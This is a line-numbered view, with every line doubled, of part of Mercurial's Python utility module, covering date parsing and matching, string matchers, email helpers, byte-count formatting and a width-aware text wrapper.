2035 usenow = False # default to using biased defaults
2035 usenow = False # default to using biased defaults
2036 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2036 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2037 part = pycompat.bytestr(part)
2037 part = pycompat.bytestr(part)
2038 found = [True for p in part if ("%"+p) in format]
2038 found = [True for p in part if ("%"+p) in format]
2039 if not found:
2039 if not found:
2040 date += "@" + defaults[part][usenow]
2040 date += "@" + defaults[part][usenow]
2041 format += "@%" + part[0]
2041 format += "@%" + part[0]
2042 else:
2042 else:
2043 # We've found a specific time element, less specific time
2043 # We've found a specific time element, less specific time
2044 # elements are relative to today
2044 # elements are relative to today
2045 usenow = True
2045 usenow = True
2046
2046
2047 timetuple = time.strptime(encoding.strfromlocal(date),
2047 timetuple = time.strptime(encoding.strfromlocal(date),
2048 encoding.strfromlocal(format))
2048 encoding.strfromlocal(format))
2049 localunixtime = int(calendar.timegm(timetuple))
2049 localunixtime = int(calendar.timegm(timetuple))
2050 if offset is None:
2050 if offset is None:
2051 # local timezone
2051 # local timezone
2052 unixtime = int(time.mktime(timetuple))
2052 unixtime = int(time.mktime(timetuple))
2053 offset = unixtime - localunixtime
2053 offset = unixtime - localunixtime
2054 else:
2054 else:
2055 unixtime = localunixtime + offset
2055 unixtime = localunixtime + offset
2056 return unixtime, offset
2056 return unixtime, offset
2057
2057
2058 def parsedate(date, formats=None, bias=None):
2058 def parsedate(date, formats=None, bias=None):
2059 """parse a localized date/time and return a (unixtime, offset) tuple.
2059 """parse a localized date/time and return a (unixtime, offset) tuple.
2060
2060
2061 The date may be a "unixtime offset" string or in one of the specified
2061 The date may be a "unixtime offset" string or in one of the specified
2062 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2062 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2063
2063
2064 >>> parsedate(b' today ') == parsedate(
2064 >>> parsedate(b' today ') == parsedate(
2065 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2065 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2066 True
2066 True
2067 >>> parsedate(b'yesterday ') == parsedate(
2067 >>> parsedate(b'yesterday ') == parsedate(
2068 ... (datetime.date.today() - datetime.timedelta(days=1)
2068 ... (datetime.date.today() - datetime.timedelta(days=1)
2069 ... ).strftime('%b %d').encode('ascii'))
2069 ... ).strftime('%b %d').encode('ascii'))
2070 True
2070 True
2071 >>> now, tz = makedate()
2071 >>> now, tz = makedate()
2072 >>> strnow, strtz = parsedate(b'now')
2072 >>> strnow, strtz = parsedate(b'now')
2073 >>> (strnow - now) < 1
2073 >>> (strnow - now) < 1
2074 True
2074 True
2075 >>> tz == strtz
2075 >>> tz == strtz
2076 True
2076 True
2077 """
2077 """
2078 if bias is None:
2078 if bias is None:
2079 bias = {}
2079 bias = {}
2080 if not date:
2080 if not date:
2081 return 0, 0
2081 return 0, 0
2082 if isinstance(date, tuple) and len(date) == 2:
2082 if isinstance(date, tuple) and len(date) == 2:
2083 return date
2083 return date
2084 if not formats:
2084 if not formats:
2085 formats = defaultdateformats
2085 formats = defaultdateformats
2086 date = date.strip()
2086 date = date.strip()
2087
2087
2088 if date == 'now' or date == _('now'):
2088 if date == 'now' or date == _('now'):
2089 return makedate()
2089 return makedate()
2090 if date == 'today' or date == _('today'):
2090 if date == 'today' or date == _('today'):
2091 date = datetime.date.today().strftime(r'%b %d')
2091 date = datetime.date.today().strftime(r'%b %d')
2092 date = encoding.strtolocal(date)
2092 date = encoding.strtolocal(date)
2093 elif date == 'yesterday' or date == _('yesterday'):
2093 elif date == 'yesterday' or date == _('yesterday'):
2094 date = (datetime.date.today() -
2094 date = (datetime.date.today() -
2095 datetime.timedelta(days=1)).strftime(r'%b %d')
2095 datetime.timedelta(days=1)).strftime(r'%b %d')
2096 date = encoding.strtolocal(date)
2096 date = encoding.strtolocal(date)
2097
2097
2098 try:
2098 try:
2099 when, offset = map(int, date.split(' '))
2099 when, offset = map(int, date.split(' '))
2100 except ValueError:
2100 except ValueError:
2101 # fill out defaults
2101 # fill out defaults
2102 now = makedate()
2102 now = makedate()
2103 defaults = {}
2103 defaults = {}
2104 for part in ("d", "mb", "yY", "HI", "M", "S"):
2104 for part in ("d", "mb", "yY", "HI", "M", "S"):
2105 # this piece is for rounding the specific end of unknowns
2105 # this piece is for rounding the specific end of unknowns
2106 b = bias.get(part)
2106 b = bias.get(part)
2107 if b is None:
2107 if b is None:
2108 if part[0:1] in "HMS":
2108 if part[0:1] in "HMS":
2109 b = "00"
2109 b = "00"
2110 else:
2110 else:
2111 b = "0"
2111 b = "0"
2112
2112
2113 # this piece is for matching the generic end to today's date
2113 # this piece is for matching the generic end to today's date
2114 n = datestr(now, "%" + part[0:1])
2114 n = datestr(now, "%" + part[0:1])
2115
2115
2116 defaults[part] = (b, n)
2116 defaults[part] = (b, n)
2117
2117
2118 for format in formats:
2118 for format in formats:
2119 try:
2119 try:
2120 when, offset = strdate(date, format, defaults)
2120 when, offset = strdate(date, format, defaults)
2121 except (ValueError, OverflowError):
2121 except (ValueError, OverflowError):
2122 pass
2122 pass
2123 else:
2123 else:
2124 break
2124 break
2125 else:
2125 else:
2126 raise error.ParseError(_('invalid date: %r') % date)
2126 raise error.ParseError(_('invalid date: %r') % date)
2127 # validate explicit (probably user-specified) date and
2127 # validate explicit (probably user-specified) date and
2128 # time zone offset. values must fit in signed 32 bits for
2128 # time zone offset. values must fit in signed 32 bits for
2129 # current 32-bit linux runtimes. timezones go from UTC-12
2129 # current 32-bit linux runtimes. timezones go from UTC-12
2130 # to UTC+14
2130 # to UTC+14
2131 if when < -0x80000000 or when > 0x7fffffff:
2131 if when < -0x80000000 or when > 0x7fffffff:
2132 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2132 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2133 if offset < -50400 or offset > 43200:
2133 if offset < -50400 or offset > 43200:
2134 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2134 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2135 return when, offset
2135 return when, offset
2136
2136
2137 def matchdate(date):
2137 def matchdate(date):
2138 """Return a function that matches a given date match specifier
2138 """Return a function that matches a given date match specifier
2139
2139
2140 Formats include:
2140 Formats include:
2141
2141
2142 '{date}' match a given date to the accuracy provided
2142 '{date}' match a given date to the accuracy provided
2143
2143
2144 '<{date}' on or before a given date
2144 '<{date}' on or before a given date
2145
2145
2146 '>{date}' on or after a given date
2146 '>{date}' on or after a given date
2147
2147
2148 >>> p1 = parsedate(b"10:29:59")
2148 >>> p1 = parsedate(b"10:29:59")
2149 >>> p2 = parsedate(b"10:30:00")
2149 >>> p2 = parsedate(b"10:30:00")
2150 >>> p3 = parsedate(b"10:30:59")
2150 >>> p3 = parsedate(b"10:30:59")
2151 >>> p4 = parsedate(b"10:31:00")
2151 >>> p4 = parsedate(b"10:31:00")
2152 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2152 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2153 >>> f = matchdate(b"10:30")
2153 >>> f = matchdate(b"10:30")
2154 >>> f(p1[0])
2154 >>> f(p1[0])
2155 False
2155 False
2156 >>> f(p2[0])
2156 >>> f(p2[0])
2157 True
2157 True
2158 >>> f(p3[0])
2158 >>> f(p3[0])
2159 True
2159 True
2160 >>> f(p4[0])
2160 >>> f(p4[0])
2161 False
2161 False
2162 >>> f(p5[0])
2162 >>> f(p5[0])
2163 False
2163 False
2164 """
2164 """
2165
2165
2166 def lower(date):
2166 def lower(date):
2167 d = {'mb': "1", 'd': "1"}
2167 d = {'mb': "1", 'd': "1"}
2168 return parsedate(date, extendeddateformats, d)[0]
2168 return parsedate(date, extendeddateformats, d)[0]
2169
2169
2170 def upper(date):
2170 def upper(date):
2171 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2171 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2172 for days in ("31", "30", "29"):
2172 for days in ("31", "30", "29"):
2173 try:
2173 try:
2174 d["d"] = days
2174 d["d"] = days
2175 return parsedate(date, extendeddateformats, d)[0]
2175 return parsedate(date, extendeddateformats, d)[0]
2176 except Abort:
2176 except Abort:
2177 pass
2177 pass
2178 d["d"] = "28"
2178 d["d"] = "28"
2179 return parsedate(date, extendeddateformats, d)[0]
2179 return parsedate(date, extendeddateformats, d)[0]
2180
2180
2181 date = date.strip()
2181 date = date.strip()
2182
2182
2183 if not date:
2183 if not date:
2184 raise Abort(_("dates cannot consist entirely of whitespace"))
2184 raise Abort(_("dates cannot consist entirely of whitespace"))
2185 elif date[0] == "<":
2185 elif date[0] == "<":
2186 if not date[1:]:
2186 if not date[1:]:
2187 raise Abort(_("invalid day spec, use '<DATE'"))
2187 raise Abort(_("invalid day spec, use '<DATE'"))
2188 when = upper(date[1:])
2188 when = upper(date[1:])
2189 return lambda x: x <= when
2189 return lambda x: x <= when
2190 elif date[0] == ">":
2190 elif date[0] == ">":
2191 if not date[1:]:
2191 if not date[1:]:
2192 raise Abort(_("invalid day spec, use '>DATE'"))
2192 raise Abort(_("invalid day spec, use '>DATE'"))
2193 when = lower(date[1:])
2193 when = lower(date[1:])
2194 return lambda x: x >= when
2194 return lambda x: x >= when
2195 elif date[0] == "-":
2195 elif date[0] == "-":
2196 try:
2196 try:
2197 days = int(date[1:])
2197 days = int(date[1:])
2198 except ValueError:
2198 except ValueError:
2199 raise Abort(_("invalid day spec: %s") % date[1:])
2199 raise Abort(_("invalid day spec: %s") % date[1:])
2200 if days < 0:
2200 if days < 0:
2201 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2201 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2202 % date[1:])
2202 % date[1:])
2203 when = makedate()[0] - days * 3600 * 24
2203 when = makedate()[0] - days * 3600 * 24
2204 return lambda x: x >= when
2204 return lambda x: x >= when
2205 elif " to " in date:
2205 elif " to " in date:
2206 a, b = date.split(" to ")
2206 a, b = date.split(" to ")
2207 start, stop = lower(a), upper(b)
2207 start, stop = lower(a), upper(b)
2208 return lambda x: x >= start and x <= stop
2208 return lambda x: x >= start and x <= stop
2209 else:
2209 else:
2210 start, stop = lower(date), upper(date)
2210 start, stop = lower(date), upper(date)
2211 return lambda x: x >= start and x <= stop
2211 return lambda x: x >= start and x <= stop
2212
2212
2213 def stringmatcher(pattern, casesensitive=True):
2213 def stringmatcher(pattern, casesensitive=True):
2214 """
2214 """
2215 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2215 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2216 returns the matcher name, pattern, and matcher function.
2216 returns the matcher name, pattern, and matcher function.
2217 missing or unknown prefixes are treated as literal matches.
2217 missing or unknown prefixes are treated as literal matches.
2218
2218
2219 helper for tests:
2219 helper for tests:
2220 >>> def test(pattern, *tests):
2220 >>> def test(pattern, *tests):
2221 ... kind, pattern, matcher = stringmatcher(pattern)
2221 ... kind, pattern, matcher = stringmatcher(pattern)
2222 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2222 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2223 >>> def itest(pattern, *tests):
2223 >>> def itest(pattern, *tests):
2224 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2224 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2225 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2225 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2226
2226
2227 exact matching (no prefix):
2227 exact matching (no prefix):
2228 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2228 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2229 ('literal', 'abcdefg', [False, False, True])
2229 ('literal', 'abcdefg', [False, False, True])
2230
2230
2231 regex matching ('re:' prefix)
2231 regex matching ('re:' prefix)
2232 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2232 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2233 ('re', 'a.+b', [False, False, True])
2233 ('re', 'a.+b', [False, False, True])
2234
2234
2235 force exact matches ('literal:' prefix)
2235 force exact matches ('literal:' prefix)
2236 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2236 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2237 ('literal', 're:foobar', [False, True])
2237 ('literal', 're:foobar', [False, True])
2238
2238
2239 unknown prefixes are ignored and treated as literals
2239 unknown prefixes are ignored and treated as literals
2240 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2240 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2241 ('literal', 'foo:bar', [False, False, True])
2241 ('literal', 'foo:bar', [False, False, True])
2242
2242
2243 case insensitive regex matches
2243 case insensitive regex matches
2244 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2244 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2245 ('re', 'A.+b', [False, False, True])
2245 ('re', 'A.+b', [False, False, True])
2246
2246
2247 case insensitive literal matches
2247 case insensitive literal matches
2248 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2248 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2249 ('literal', 'ABCDEFG', [False, False, True])
2249 ('literal', 'ABCDEFG', [False, False, True])
2250 """
2250 """
2251 if pattern.startswith('re:'):
2251 if pattern.startswith('re:'):
2252 pattern = pattern[3:]
2252 pattern = pattern[3:]
2253 try:
2253 try:
2254 flags = 0
2254 flags = 0
2255 if not casesensitive:
2255 if not casesensitive:
2256 flags = remod.I
2256 flags = remod.I
2257 regex = remod.compile(pattern, flags)
2257 regex = remod.compile(pattern, flags)
2258 except remod.error as e:
2258 except remod.error as e:
2259 raise error.ParseError(_('invalid regular expression: %s')
2259 raise error.ParseError(_('invalid regular expression: %s')
2260 % e)
2260 % e)
2261 return 're', pattern, regex.search
2261 return 're', pattern, regex.search
2262 elif pattern.startswith('literal:'):
2262 elif pattern.startswith('literal:'):
2263 pattern = pattern[8:]
2263 pattern = pattern[8:]
2264
2264
2265 match = pattern.__eq__
2265 match = pattern.__eq__
2266
2266
2267 if not casesensitive:
2267 if not casesensitive:
2268 ipat = encoding.lower(pattern)
2268 ipat = encoding.lower(pattern)
2269 match = lambda s: ipat == encoding.lower(s)
2269 match = lambda s: ipat == encoding.lower(s)
2270 return 'literal', pattern, match
2270 return 'literal', pattern, match
2271
2271
2272 def shortuser(user):
2272 def shortuser(user):
2273 """Return a short representation of a user name or email address."""
2273 """Return a short representation of a user name or email address."""
2274 f = user.find('@')
2274 f = user.find('@')
2275 if f >= 0:
2275 if f >= 0:
2276 user = user[:f]
2276 user = user[:f]
2277 f = user.find('<')
2277 f = user.find('<')
2278 if f >= 0:
2278 if f >= 0:
2279 user = user[f + 1:]
2279 user = user[f + 1:]
2280 f = user.find(' ')
2280 f = user.find(' ')
2281 if f >= 0:
2281 if f >= 0:
2282 user = user[:f]
2282 user = user[:f]
2283 f = user.find('.')
2283 f = user.find('.')
2284 if f >= 0:
2284 if f >= 0:
2285 user = user[:f]
2285 user = user[:f]
2286 return user
2286 return user
2287
2287
2288 def emailuser(user):
2288 def emailuser(user):
2289 """Return the user portion of an email address."""
2289 """Return the user portion of an email address."""
2290 f = user.find('@')
2290 f = user.find('@')
2291 if f >= 0:
2291 if f >= 0:
2292 user = user[:f]
2292 user = user[:f]
2293 f = user.find('<')
2293 f = user.find('<')
2294 if f >= 0:
2294 if f >= 0:
2295 user = user[f + 1:]
2295 user = user[f + 1:]
2296 return user
2296 return user
2297
2297
2298 def email(author):
2298 def email(author):
2299 '''get email of author.'''
2299 '''get email of author.'''
2300 r = author.find('>')
2300 r = author.find('>')
2301 if r == -1:
2301 if r == -1:
2302 r = None
2302 r = None
2303 return author[author.find('<') + 1:r]
2303 return author[author.find('<') + 1:r]
2304
2304
2305 def ellipsis(text, maxlength=400):
2305 def ellipsis(text, maxlength=400):
2306 """Trim string to at most maxlength (default: 400) columns in display."""
2306 """Trim string to at most maxlength (default: 400) columns in display."""
2307 return encoding.trim(text, maxlength, ellipsis='...')
2307 return encoding.trim(text, maxlength, ellipsis='...')
2308
2308
2309 def unitcountfn(*unittable):
2309 def unitcountfn(*unittable):
2310 '''return a function that renders a readable count of some quantity'''
2310 '''return a function that renders a readable count of some quantity'''
2311
2311
2312 def go(count):
2312 def go(count):
2313 for multiplier, divisor, format in unittable:
2313 for multiplier, divisor, format in unittable:
2314 if abs(count) >= divisor * multiplier:
2314 if abs(count) >= divisor * multiplier:
2315 return format % (count / float(divisor))
2315 return format % (count / float(divisor))
2316 return unittable[-1][2] % count
2316 return unittable[-1][2] % count
2317
2317
2318 return go
2318 return go
2319
2319
2320 def processlinerange(fromline, toline):
2320 def processlinerange(fromline, toline):
2321 """Check that linerange <fromline>:<toline> makes sense and return a
2321 """Check that linerange <fromline>:<toline> makes sense and return a
2322 0-based range.
2322 0-based range.
2323
2323
2324 >>> processlinerange(10, 20)
2324 >>> processlinerange(10, 20)
2325 (9, 20)
2325 (9, 20)
2326 >>> processlinerange(2, 1)
2326 >>> processlinerange(2, 1)
2327 Traceback (most recent call last):
2327 Traceback (most recent call last):
2328 ...
2328 ...
2329 ParseError: line range must be positive
2329 ParseError: line range must be positive
2330 >>> processlinerange(0, 5)
2330 >>> processlinerange(0, 5)
2331 Traceback (most recent call last):
2331 Traceback (most recent call last):
2332 ...
2332 ...
2333 ParseError: fromline must be strictly positive
2333 ParseError: fromline must be strictly positive
2334 """
2334 """
2335 if toline - fromline < 0:
2335 if toline - fromline < 0:
2336 raise error.ParseError(_("line range must be positive"))
2336 raise error.ParseError(_("line range must be positive"))
2337 if fromline < 1:
2337 if fromline < 1:
2338 raise error.ParseError(_("fromline must be strictly positive"))
2338 raise error.ParseError(_("fromline must be strictly positive"))
2339 return fromline - 1, toline
2339 return fromline - 1, toline
2340
2340
2341 bytecount = unitcountfn(
2341 bytecount = unitcountfn(
2342 (100, 1 << 30, _('%.0f GB')),
2342 (100, 1 << 30, _('%.0f GB')),
2343 (10, 1 << 30, _('%.1f GB')),
2343 (10, 1 << 30, _('%.1f GB')),
2344 (1, 1 << 30, _('%.2f GB')),
2344 (1, 1 << 30, _('%.2f GB')),
2345 (100, 1 << 20, _('%.0f MB')),
2345 (100, 1 << 20, _('%.0f MB')),
2346 (10, 1 << 20, _('%.1f MB')),
2346 (10, 1 << 20, _('%.1f MB')),
2347 (1, 1 << 20, _('%.2f MB')),
2347 (1, 1 << 20, _('%.2f MB')),
2348 (100, 1 << 10, _('%.0f KB')),
2348 (100, 1 << 10, _('%.0f KB')),
2349 (10, 1 << 10, _('%.1f KB')),
2349 (10, 1 << 10, _('%.1f KB')),
2350 (1, 1 << 10, _('%.2f KB')),
2350 (1, 1 << 10, _('%.2f KB')),
2351 (1, 1, _('%.0f bytes')),
2351 (1, 1, _('%.0f bytes')),
2352 )
2352 )
2353
2353
2354 # Matches a single EOL which can either be a CRLF where repeated CR
2354 # Matches a single EOL which can either be a CRLF where repeated CR
2355 # are removed or a LF. We do not care about old Macintosh files, so a
2355 # are removed or a LF. We do not care about old Macintosh files, so a
2356 # stray CR is an error.
2356 # stray CR is an error.
2357 _eolre = remod.compile(br'\r*\n')
2357 _eolre = remod.compile(br'\r*\n')
2358
2358
2359 def tolf(s):
2359 def tolf(s):
2360 return _eolre.sub('\n', s)
2360 return _eolre.sub('\n', s)
2361
2361
2362 def tocrlf(s):
2362 def tocrlf(s):
2363 return _eolre.sub('\r\n', s)
2363 return _eolre.sub('\r\n', s)
2364
2364
2365 if pycompat.oslinesep == '\r\n':
2365 if pycompat.oslinesep == '\r\n':
2366 tonativeeol = tocrlf
2366 tonativeeol = tocrlf
2367 fromnativeeol = tolf
2367 fromnativeeol = tolf
2368 else:
2368 else:
2369 tonativeeol = pycompat.identity
2369 tonativeeol = pycompat.identity
2370 fromnativeeol = pycompat.identity
2370 fromnativeeol = pycompat.identity
2371
2371
2372 def escapestr(s):
2372 def escapestr(s):
2373 # call underlying function of s.encode('string_escape') directly for
2373 # call underlying function of s.encode('string_escape') directly for
2374 # Python 3 compatibility
2374 # Python 3 compatibility
2375 return codecs.escape_encode(s)[0]
2375 return codecs.escape_encode(s)[0]
2376
2376
2377 def unescapestr(s):
2377 def unescapestr(s):
2378 return codecs.escape_decode(s)[0]
2378 return codecs.escape_decode(s)[0]
2379
2379
2380 def forcebytestr(obj):
2380 def forcebytestr(obj):
2381 """Portably format an arbitrary object (e.g. exception) into a byte
2381 """Portably format an arbitrary object (e.g. exception) into a byte
2382 string."""
2382 string."""
2383 try:
2383 try:
2384 return pycompat.bytestr(obj)
2384 return pycompat.bytestr(obj)
2385 except UnicodeEncodeError:
2385 except UnicodeEncodeError:
2386 # non-ascii string, may be lossy
2386 # non-ascii string, may be lossy
2387 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2387 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2388
2388
2389 def uirepr(s):
2389 def uirepr(s):
2390 # Avoid double backslash in Windows path repr()
2390 # Avoid double backslash in Windows path repr()
2391 return repr(s).replace('\\\\', '\\')
2391 return repr(s).replace('\\\\', '\\')
2392
2392
2393 # delay import of textwrap
2393 # delay import of textwrap
2394 def MBTextWrapper(**kwargs):
2394 def MBTextWrapper(**kwargs):
2395 class tw(textwrap.TextWrapper):
2395 class tw(textwrap.TextWrapper):
2396 """
2396 """
2397 Extend TextWrapper for width-awareness.
2397 Extend TextWrapper for width-awareness.
2398
2398
2399 Neither number of 'bytes' in any encoding nor 'characters' is
2399 Neither number of 'bytes' in any encoding nor 'characters' is
2400 appropriate to calculate terminal columns for specified string.
2400 appropriate to calculate terminal columns for specified string.
2401
2401
2402 Original TextWrapper implementation uses built-in 'len()' directly,
2402 Original TextWrapper implementation uses built-in 'len()' directly,
2403 so overriding is needed to use width information of each characters.
2403 so overriding is needed to use width information of each characters.
2404
2404
2405 In addition, characters classified into 'ambiguous' width are
2405 In addition, characters classified into 'ambiguous' width are
2406 treated as wide in East Asian area, but as narrow in other.
2406 treated as wide in East Asian area, but as narrow in other.
2407
2407
2408 This requires use decision to determine width of such characters.
2408 This requires use decision to determine width of such characters.
2409 """
2409 """
2410 def _cutdown(self, ucstr, space_left):
2410 def _cutdown(self, ucstr, space_left):
2411 l = 0
2411 l = 0
2412 colwidth = encoding.ucolwidth
2412 colwidth = encoding.ucolwidth
2413 for i in xrange(len(ucstr)):
2413 for i in xrange(len(ucstr)):
2414 l += colwidth(ucstr[i])
2414 l += colwidth(ucstr[i])
2415 if space_left < l:
2415 if space_left < l:
2416 return (ucstr[:i], ucstr[i:])
2416 return (ucstr[:i], ucstr[i:])
2417 return ucstr, ''
2417 return ucstr, ''
2418
2418
2419 # overriding of base class
2419 # overriding of base class
2420 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2420 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2421 space_left = max(width - cur_len, 1)
2421 space_left = max(width - cur_len, 1)
2422
2422
2423 if self.break_long_words:
2423 if self.break_long_words:
2424 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2424 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2425 cur_line.append(cut)
2425 cur_line.append(cut)
2426 reversed_chunks[-1] = res
2426 reversed_chunks[-1] = res
2427 elif not cur_line:
2427 elif not cur_line:
2428 cur_line.append(reversed_chunks.pop())
2428 cur_line.append(reversed_chunks.pop())
2429
2429
2430 # this overriding code is imported from TextWrapper of Python 2.6
2430 # this overriding code is imported from TextWrapper of Python 2.6
2431 # to calculate columns of string by 'encoding.ucolwidth()'
2431 # to calculate columns of string by 'encoding.ucolwidth()'
2432 def _wrap_chunks(self, chunks):
2432 def _wrap_chunks(self, chunks):
2433 colwidth = encoding.ucolwidth
2433 colwidth = encoding.ucolwidth
2434
2434
2435 lines = []
2435 lines = []
2436 if self.width <= 0:
2436 if self.width <= 0:
2437 raise ValueError("invalid width %r (must be > 0)" % self.width)
2437 raise ValueError("invalid width %r (must be > 0)" % self.width)
2438
2438
2439 # Arrange in reverse order so items can be efficiently popped
2439 # Arrange in reverse order so items can be efficiently popped
2440 # from a stack of chucks.
2440 # from a stack of chucks.
2441 chunks.reverse()
2441 chunks.reverse()
2442
2442
2443 while chunks:
2443 while chunks:
2444
2444
2445 # Start the list of chunks that will make up the current line.
2445 # Start the list of chunks that will make up the current line.
2446 # cur_len is just the length of all the chunks in cur_line.
2446 # cur_len is just the length of all the chunks in cur_line.
2447 cur_line = []
2447 cur_line = []
2448 cur_len = 0
2448 cur_len = 0
2449
2449
2450 # Figure out which static string will prefix this line.
2450 # Figure out which static string will prefix this line.
2451 if lines:
2451 if lines:
2452 indent = self.subsequent_indent
2452 indent = self.subsequent_indent
2453 else:
2453 else:
2454 indent = self.initial_indent
2454 indent = self.initial_indent
2455
2455
2456 # Maximum width for this line.
2456 # Maximum width for this line.
2457 width = self.width - len(indent)
2457 width = self.width - len(indent)
2458
2458
2459 # First chunk on line is whitespace -- drop it, unless this
2459 # First chunk on line is whitespace -- drop it, unless this
2460 # is the very beginning of the text (i.e. no lines started yet).
2460 # is the very beginning of the text (i.e. no lines started yet).
2461 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2461 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2462 del chunks[-1]
2462 del chunks[-1]
2463
2463
2464 while chunks:
2464 while chunks:
2465 l = colwidth(chunks[-1])
2465 l = colwidth(chunks[-1])
2466
2466
2467 # Can at least squeeze this chunk onto the current line.
2467 # Can at least squeeze this chunk onto the current line.
2468 if cur_len + l <= width:
2468 if cur_len + l <= width:
2469 cur_line.append(chunks.pop())
2469 cur_line.append(chunks.pop())
2470 cur_len += l
2470 cur_len += l
2471
2471
2472 # Nope, this line is full.
2472 # Nope, this line is full.
2473 else:
2473 else:
2474 break
2474 break
2475
2475
2476 # The current line is full, and the next chunk is too big to
2476 # The current line is full, and the next chunk is too big to
2477 # fit on *any* line (not just this one).
2477 # fit on *any* line (not just this one).
2478 if chunks and colwidth(chunks[-1]) > width:
2478 if chunks and colwidth(chunks[-1]) > width:
2479 self._handle_long_word(chunks, cur_line, cur_len, width)
2479 self._handle_long_word(chunks, cur_line, cur_len, width)
2480
2480
2481 # If the last chunk on this line is all whitespace, drop it.
2481 # If the last chunk on this line is all whitespace, drop it.
2482 if (self.drop_whitespace and
2482 if (self.drop_whitespace and
2483 cur_line and cur_line[-1].strip() == r''):
2483 cur_line and cur_line[-1].strip() == r''):
2484 del cur_line[-1]
2484 del cur_line[-1]
2485
2485
2486 # Convert current line back to a string and store it in list
2486 # Convert current line back to a string and store it in list
2487 # of all lines (return value).
2487 # of all lines (return value).
2488 if cur_line:
2488 if cur_line:
2489 lines.append(indent + r''.join(cur_line))
2489 lines.append(indent + r''.join(cur_line))
2490
2490
2491 return lines
2491 return lines
2492
2492
2493 global MBTextWrapper
2493 global MBTextWrapper
2494 MBTextWrapper = tw
2494 MBTextWrapper = tw
2495 return tw(**kwargs)
2495 return tw(**kwargs)
2496
2496
2497 def wrap(line, width, initindent='', hangindent=''):
2497 def wrap(line, width, initindent='', hangindent=''):
2498 maxindent = max(len(hangindent), len(initindent))
2498 maxindent = max(len(hangindent), len(initindent))
2499 if width <= maxindent:
2499 if width <= maxindent:
2500 # adjust for weird terminal size
2500 # adjust for weird terminal size
2501 width = max(78, maxindent + 1)
2501 width = max(78, maxindent + 1)
2502 line = line.decode(pycompat.sysstr(encoding.encoding),
2502 line = line.decode(pycompat.sysstr(encoding.encoding),
2503 pycompat.sysstr(encoding.encodingmode))
2503 pycompat.sysstr(encoding.encodingmode))
2504 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2504 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2505 pycompat.sysstr(encoding.encodingmode))
2505 pycompat.sysstr(encoding.encodingmode))
2506 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2506 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2507 pycompat.sysstr(encoding.encodingmode))
2507 pycompat.sysstr(encoding.encodingmode))
2508 wrapper = MBTextWrapper(width=width,
2508 wrapper = MBTextWrapper(width=width,
2509 initial_indent=initindent,
2509 initial_indent=initindent,
2510 subsequent_indent=hangindent)
2510 subsequent_indent=hangindent)
2511 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2511 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2512
2512
2513 if (pyplatform.python_implementation() == 'CPython' and
2513 if (pyplatform.python_implementation() == 'CPython' and
2514 sys.version_info < (3, 0)):
2514 sys.version_info < (3, 0)):
2515 # There is an issue in CPython that some IO methods do not handle EINTR
2515 # There is an issue in CPython that some IO methods do not handle EINTR
2516 # correctly. The following table shows what CPython version (and functions)
2516 # correctly. The following table shows what CPython version (and functions)
2517 # are affected (buggy: has the EINTR bug, okay: otherwise):
2517 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 #
2518 #
2519 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2519 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 # --------------------------------------------------
2520 # --------------------------------------------------
2521 # fp.__iter__ | buggy | buggy | okay
2521 # fp.__iter__ | buggy | buggy | okay
2522 # fp.read* | buggy | okay [1] | okay
2522 # fp.read* | buggy | okay [1] | okay
2523 #
2523 #
2524 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2524 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 #
2525 #
2526 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
